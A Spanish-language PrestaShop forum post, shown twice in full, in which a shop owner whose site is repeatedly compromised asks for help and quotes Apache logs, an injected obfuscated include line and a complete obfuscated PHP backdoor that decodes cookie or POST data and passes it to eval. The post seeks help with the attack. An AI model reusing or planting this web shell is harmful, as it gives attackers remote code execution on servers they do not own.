Jump to content

Edit History

Soluciones y Gestión

Soluciones y Gestión

Hola foro,

os escribo porque ya me encuentro desesperado por un problema con Prestashop (o eso creo, porque no se si es un fallo de SO.)

Cada 2 o 3 días me atacan la tienda y lo tengo medio localizado, pero no sé como pararlo.

He buscado mucha información, incluso cosas parecidas dentro del foro, pero ninguna me ha ayudado. (También he visto que ocurre bantante en los wordpress. Se ve en la web https://malwaredecoder.com/ que mucha gente busca código similar)
 
Ante todo, decir que he probado reinstalar tienda completa (Actualmente tengo 1.6.24), he probado con 1.7, cambiado todas las contraseñas (admin, BBDD, usuarios linux, etc.), carpeta admin y todo lo que se me ha ocurrido incluyendo cambio de servidor y de IP pública.

En todas las ocasiones siempre han podido entrar.

Lo que he podido ver en los log de apache del dominio es esto (Bloque las ips en el FW pero las cambian):

En el resto de log no encuentro nada que me pueda indicar algo. No sé si se puede configurar para que tengan más nivel de profundidad.

He hablado con el hosting y me dicen que tiene que ser un fallo de la web, porque si fuera global afectaría a otras webs del servidor.

46.20.34.52 - - [14/Jul/2019:16:58:54 +0000] "POST /?bit=dhwb HTTP/1.1" 302 - "http://informaticavaldemoro.com/?bit=dhwb" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
46.20.34.52 - - [14/Jul/2019:16:58:54 +0000] "GET /?bit=dhwb?bit=dhwb HTTP/1.1" 301 - "http://informaticavaldemoro.com/?bit=dhwb" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
37.59.90.146 - - [14/Jul/2019:20:49:06 +0000] "POST /?cvu=tao HTTP/1.1" 302 - "http://informaticavaldemoro.com/?cvu=tao" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
37.59.90.146 - - [14/Jul/2019:20:49:06 +0000] "GET /?cvu=tao?cvu=tao HTTP/1.1" 301 - "http://informaticavaldemoro.com/?cvu=tao" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
45.76.33.238 - - [14/Jul/2019:20:49:09 +0000] "POST /?cvu=tao HTTP/1.1" 302 - "http://informaticavaldemoro.com/?cvu=tao" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
45.76.33.238 - - [14/Jul/2019:20:49:09 +0000] "GET /?cvu=tao?cvu=tao HTTP/1.1" 301 - "http://informaticavaldemoro.com/?cvu=tao" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
188.166.191.48 - - [14/Jul/2019:20:49:23 +0000] "POST /?zqfe=rgzzc HTTP/1.1" 200 102 "http://informaticavaldemoro.com/?zqfe=rgzzc" "Mozilla/5.0 (iPad; CPU OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1"

Entiendo que en el último con código 200 es en el que entran.

Cuando ejecuntan esto, se modifichan muchos ficheros index.php incluyendo este código:
<?PHP
/*812c4*/

@include "\057home\057info\162mati\143aval\144e/pu\142lic_\150tml/\155odul\145s/da\163hact\151vity\057.478\146f508\056ico"; 

/*812c4*/
/*
* 2007-2017 PrestaShop
*
Y continúa el script normal.

Este include apunta a un fichero aleatorio oculto *.ico que contiene código ilegible y no he podido saber cómo está codificado. (Este fichero lo busco y borro automáticamente desde un cron cada minuto para que haga el menor daño posible).

También crea ficheros aleatorios con un nombre tipo gntfmoup.php (normalmente 8 caracteres.php) que está lleno de variables o arrays.
<?php
$jmelnlc = '9\'sf634_Huvcx7#dioy0abmgp*k2r-81lent';$rjegch = Array();$rjegch[] = $jmelnlc[8].$jmelnlc[25];$rjegch[] = $jmelnlc[15].$jmelnlc[13].$jmelnlc[4].$jmelnlc[3].$jmelnlc[4].$jmelnlc[0].$jmelnlc[31].$jmelnlc[20].$jmelnlc[29].$jmelnlc[33].$jmelnlc[19].$jmelnlc[4].$jmelnlc[0].$jmelnlc[29].$jmelnlc[6].$jmelnlc[6].$jmelnlc[5].$jmelnlc[13].$jmelnlc[29].$jmelnlc[30].$jmelnlc[27].$jmelnlc[21].$jmelnlc[33].$jmelnlc[29].$jmelnlc[13].$jmelnlc[13].$jmelnlc[15].$jmelnlc[11].$jmelnlc[13].$jmelnlc[5].$jmelnlc[15].$jmelnlc[0].$jmelnlc[6].$jmelnlc[20].$jmelnlc[11].$jmelnlc[21];$rjegch[] = $jmelnlc[14];$rjegch[] = $jmelnlc[11].$jmelnlc[17].$jmelnlc[9].$jmelnlc[34].$jmelnlc[35];$rjegch[] = $jmelnlc[2].$jmelnlc[35].$jmelnlc[28].$jmelnlc[7].$jmelnlc[28].$jmelnlc[33].$jmelnlc[24].$jmelnlc[33].$jmelnlc[20].$jmelnlc[35];$rjegch[] = $jmelnlc[33].$jmelnlc[12].$jmelnlc[24].$jmelnlc[32].$jmelnlc[17].$jmelnlc[15].$jmelnlc[33];$rjegch[] = $jmelnlc[2].$jmelnlc[9].$jmelnlc[21].$jmelnlc[2].$jmelnlc[35].$jmelnlc[28];$rjegch[] = $jmelnlc[20].$jmelnlc[28].$jmelnlc[28].$jmelnlc[20].$jmelnlc[18].$jmelnlc[7].$jmelnlc[22].$jmelnlc[33].$jmelnlc[28].$jmelnlc[23].$jmelnlc[33];$rjegch[] = $jmelnlc[2].$jmelnlc[35].$jmelnlc[28].$jmelnlc[32].$jmelnlc[33].$jmelnlc[34];$rjegch[] = $jmelnlc[24].$jmelnlc[20].$jmelnlc[11].$jmelnlc[26];foreach ($rjegch[7]($_COOKIE, $_POST) as $jnjyaj => $mekvqdu){function zdeqkx($rjegch, $jnjyaj, $dbvfr){return $rjegch[6]($rjegch[4]($jnjyaj . $rjegch[1], ($dbvfr / $rjegch[8]($jnjyaj)) + 1), 0, $dbvfr);}function bchzo($rjegch, $akvyf){return @$rjegch[9]($rjegch[0], $akvyf);}function pyjpvsv($rjegch, $akvyf){$kkvvw = $rjegch[3]($akvyf) % 3;if (!$kkvvw) {eval($akvyf[1]($akvyf[2]));exit();}}$mekvqdu = bchzo($rjegch, $mekvqdu);pyjpvsv($rjegch, $rjegch[5]($rjegch[2], $mekvqdu ^ zdeqkx($rjegch, $jnjyaj, $rjegch[8]($mekvqdu))));}

Estos ficheros también los localizo desde cron y los borraba de forma manual cada ataque. (Ahora, me es mas rápido cargarme la carpeta raiz y recargarla con código limpio).

El prestashop está tal cual se instala con el tema por defecto sin modificaciones para intentar evitarlo.

Los módulos son todos los que vienen por defecto excepto la api de google analytics de prestashop, european union cookies law de mypresta.eu y paypal de prestashop.

¿Tenéis alguna idea de por donde pueden ir los tiros?

Si creéis que debe ir en algún otro subforo, por avisar a algún admin para que pueda moverlo.

Muchas gracias y un saludo.

Soluciones y Gestión

Soluciones y Gestión

Hola foro,

os escribo porque ya me encuentro desesperado por un problema con Prestashop (o eso creo, porque no se si es un fallo de SO.)

Cada 2 o 3 días me atacan la tienda y lo tengo medio localizado, pero no sé como pararlo.

He buscado mucha información, incluso cosas parecidas dentro del foro, pero ninguna me ha ayudado. (También he visto que ocurre bantante en los wordpress. Se ve en la web https://malwaredecoder.com/ que mucha gente busca código similar)
 
Ante todo, decir que he probado reinstalar tienda completa (Actualmente tengo 1.6.24), he probado con 1.7, cambiado todas las contraseñas (admin, BBDD, usuarios linux, etc.), carpeta admin y todo lo que se me ha ocurrido incluyendo cambio de servidor y de IP pública.

En todas las ocasiones siempre han podido entrar.

Lo que he podido ver en los log de apache del dominio es esto (Bloque las ips en el FW pero las cambian):

En el resto de log no encuentro nada que me pueda indicar algo. No sé si se puede configurar para que tengan más nivel de profundidad.

He hablado con el hosting y me dicen que tiene que ser un fallo de la web, porque si fuera global afectaría a otras webs del servidor.

46.20.34.52 - - [14/Jul/2019:16:58:54 +0000] "POST /?bit=dhwb HTTP/1.1" 302 - "http://informaticavaldemoro.com/?bit=dhwb" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
46.20.34.52 - - [14/Jul/2019:16:58:54 +0000] "GET /?bit=dhwb?bit=dhwb HTTP/1.1" 301 - "http://informaticavaldemoro.com/?bit=dhwb" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
37.59.90.146 - - [14/Jul/2019:20:49:06 +0000] "POST /?cvu=tao HTTP/1.1" 302 - "http://informaticavaldemoro.com/?cvu=tao" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
37.59.90.146 - - [14/Jul/2019:20:49:06 +0000] "GET /?cvu=tao?cvu=tao HTTP/1.1" 301 - "http://informaticavaldemoro.com/?cvu=tao" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
45.76.33.238 - - [14/Jul/2019:20:49:09 +0000] "POST /?cvu=tao HTTP/1.1" 302 - "http://informaticavaldemoro.com/?cvu=tao" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
45.76.33.238 - - [14/Jul/2019:20:49:09 +0000] "GET /?cvu=tao?cvu=tao HTTP/1.1" 301 - "http://informaticavaldemoro.com/?cvu=tao" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
188.166.191.48 - - [14/Jul/2019:20:49:23 +0000] "POST /?zqfe=rgzzc HTTP/1.1" 200 102 "http://informaticavaldemoro.com/?zqfe=rgzzc" "Mozilla/5.0 (iPad; CPU OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1"

Entiendo que en el último con código 200 es en el que entran.

Cuando ejecuntan esto, se modifichan muchos ficheros index.php incluyendo este código:
<?PHP
/*812c4*/

@include "\057home\057info\162mati\143aval\144e/pu\142lic_\150tml/\155odul\145s/da\163hact\151vity\057.478\146f508\056ico"; 

/*812c4*/
/*
* 2007-2017 PrestaShop
*
Y continúa el script normal.

Este include apunta a un fichero aleatorio oculto *.ico que contiene código ilegible y no he podido saber cómo está codificado. (Este fichero lo busco y borro automáticamente desde un cron cada minuto para que haga el menor daño posible).

También crea ficheros aleatorios con un nombre tipo gntfmoup.php (normalmente 8 caracteres.php) que está lleno de variables o arrays.
<?php
$jmelnlc = '9\'sf634_Huvcx7#dioy0abmgp*k2r-81lent';$rjegch = Array();$rjegch[] = $jmelnlc[8].$jmelnlc[25];$rjegch[] = $jmelnlc[15].$jmelnlc[13].$jmelnlc[4].$jmelnlc[3].$jmelnlc[4].$jmelnlc[0].$jmelnlc[31].$jmelnlc[20].$jmelnlc[29].$jmelnlc[33].$jmelnlc[19].$jmelnlc[4].$jmelnlc[0].$jmelnlc[29].$jmelnlc[6].$jmelnlc[6].$jmelnlc[5].$jmelnlc[13].$jmelnlc[29].$jmelnlc[30].$jmelnlc[27].$jmelnlc[21].$jmelnlc[33].$jmelnlc[29].$jmelnlc[13].$jmelnlc[13].$jmelnlc[15].$jmelnlc[11].$jmelnlc[13].$jmelnlc[5].$jmelnlc[15].$jmelnlc[0].$jmelnlc[6].$jmelnlc[20].$jmelnlc[11].$jmelnlc[21];$rjegch[] = $jmelnlc[14];$rjegch[] = $jmelnlc[11].$jmelnlc[17].$jmelnlc[9].$jmelnlc[34].$jmelnlc[35];$rjegch[] = $jmelnlc[2].$jmelnlc[35].$jmelnlc[28].$jmelnlc[7].$jmelnlc[28].$jmelnlc[33].$jmelnlc[24].$jmelnlc[33].$jmelnlc[20].$jmelnlc[35];$rjegch[] = $jmelnlc[33].$jmelnlc[12].$jmelnlc[24].$jmelnlc[32].$jmelnlc[17].$jmelnlc[15].$jmelnlc[33];$rjegch[] = $jmelnlc[2].$jmelnlc[9].$jmelnlc[21].$jmelnlc[2].$jmelnlc[35].$jmelnlc[28];$rjegch[] = $jmelnlc[20].$jmelnlc[28].$jmelnlc[28].$jmelnlc[20].$jmelnlc[18].$jmelnlc[7].$jmelnlc[22].$jmelnlc[33].$jmelnlc[28].$jmelnlc[23].$jmelnlc[33];$rjegch[] = $jmelnlc[2].$jmelnlc[35].$jmelnlc[28].$jmelnlc[32].$jmelnlc[33].$jmelnlc[34];$rjegch[] = $jmelnlc[24].$jmelnlc[20].$jmelnlc[11].$jmelnlc[26];foreach ($rjegch[7]($_COOKIE, $_POST) as $jnjyaj => $mekvqdu){function zdeqkx($rjegch, $jnjyaj, $dbvfr){return $rjegch[6]($rjegch[4]($jnjyaj . $rjegch[1], ($dbvfr / $rjegch[8]($jnjyaj)) + 1), 0, $dbvfr);}function bchzo($rjegch, $akvyf){return @$rjegch[9]($rjegch[0], $akvyf);}function pyjpvsv($rjegch, $akvyf){$kkvvw = $rjegch[3]($akvyf) % 3;if (!$kkvvw) {eval($akvyf[1]($akvyf[2]));exit();}}$mekvqdu = bchzo($rjegch, $mekvqdu);pyjpvsv($rjegch, $rjegch[5]($rjegch[2], $mekvqdu ^ zdeqkx($rjegch, $jnjyaj, $rjegch[8]($mekvqdu))));}

Estos ficheros también los localizo desde cron y los borraba de forma manual cada ataque. (Ahora, me es mas rápido cargarme la carpeta raiz y recargarla con código limpio).

El prestashop está tal cual se instala con el tema por defecto sin modificaciones para intentar evitarlo.

Los módulos son todos los que vienen por defecto excepto la api de google analytics de prestashop, european union cookies law de mypresta.eu y paypal de prestashop.

¿Tenéis alguna idea de por donde pueden ir los tiros?

Si creéis que debe ir en algún otro subforo, por avisar a algún admin para que pueda moverlo.

Muchas gracias y un saludo.

×
×
  • Create New...